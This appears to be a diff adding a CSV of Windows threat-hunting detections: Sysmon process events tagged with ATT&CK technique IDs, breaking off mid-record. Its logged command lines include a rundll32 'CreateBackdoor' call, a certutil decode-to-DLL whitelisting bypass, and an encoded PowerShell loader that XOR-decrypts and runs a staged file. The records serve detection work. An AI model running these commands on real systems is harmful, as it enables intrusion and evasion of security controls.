+[T1117] Bypassing Application Whitelisting,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:17.992377Z"">
+    </TimeCreated>
+    <EventRecordID>243514</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.511</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010736B1E00</Data>
+    <Data Name=""ProcessId"">8116</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-09T02:08:00.446150Z"">
+    </TimeCreated>
+    <EventRecordID>11126</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1980"" ThreadID=""1904"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-09 02:08:00.336</Data>
+    <Data Name=""ProcessGuid"">365ABB72-8B80-5CD3-0000-001065512A00</Data>
+    <Data Name=""ProcessId"">2264</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c notepad.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-863B-5CD3-0000-00204A390100</Data>
+    <Data Name=""LogonId"">0x1394a</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-8B77-5CD3-0000-0010E8FD2900</Data>
+    <Data Name=""ParentProcessId"">3836</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\sdclt.exe</Data>
+    <Data Name=""ParentCommandLine"">?</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:17.992377Z"">
+    </TimeCreated>
+    <EventRecordID>243514</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.511</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010736B1E00</Data>
+    <Data Name=""ProcessId"">8116</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:17.992377Z"">
+    </TimeCreated>
+    <EventRecordID>243514</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:17.511</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-0010736B1E00</Data>
+    <Data Name=""ProcessId"">8116</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920560.204919,2019-05-27T05:29:20.204919+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:20.204919Z"">
+    </TimeCreated>
+    <EventRecordID>5982</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:20.164</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-0010B2E2FF00</Data>
+    <Data Name=""ProcessId"">2108</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list vdir /text:userName</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-03T15:08:07.558917Z"">
+    </TimeCreated>
+    <EventRecordID>5532</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-03 15:08:07.355</Data>
+    <Data Name=""ProcessGuid"">747F3D96-A357-5D45-0000-0010BD149A01</Data>
+    <Data Name=""ProcessId"">5396</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
+    <Data Name=""LogonId"">0x18d3b3</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-A356-5D45-0000-001014F99901</Data>
+    <Data Name=""ParentProcessId"">4056</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\mmc.exe&quot; eventvwr.msc</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1589296009.450298,2020-05-12T19:06:49.450298+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-05-12T15:06:49.447990Z"">
+    </TimeCreated>
+    <EventRecordID>143189</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2856"" ThreadID=""3608"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-05-12 15:06:49.415</Data>
+    <Data Name=""ProcessGuid"">747F3D96-BB89-5EBA-0000-001019683600</Data>
+    <Data Name=""ProcessId"">4688</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-B086-5EBA-0000-0020BF9E0800</Data>
+    <Data Name=""LogonId"">0x89ebf</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-BB89-5EBA-0000-001042653600</Data>
+    <Data Name=""ParentProcessId"">1088</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil  -f -decode fi.b64 AllTheThings.dll )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:32:59.234755Z"">
+    </TimeCreated>
+    <EventRecordID>4890</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:32:58.940</Data>
+    <Data Name=""ProcessGuid"">747F3D96-660A-5D3F-0000-0010FFF28500</Data>
+    <Data Name=""ProcessId"">700</Data>
+    <Data Name=""Image"">C:\Windows\System32\certutil.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">CertUtil.exe</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">certutil  -f -decode fi.b64 AllTheThings.dll </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-660A-5D3F-0000-0010B9E08500</Data>
+    <Data Name=""ParentProcessId"">3184</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c certutil -f -decode fi.b64 AllTheThings.dll </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T18:10:42.668784Z"">
+    </TimeCreated>
+    <EventRecordID>16150</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""2020"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-11 18:10:42.653</Data>
+    <Data Name=""ProcessGuid"">365ABB72-1022-5CD7-0000-0010DF121C00</Data>
+    <Data Name=""ProcessId"">3248</Data>
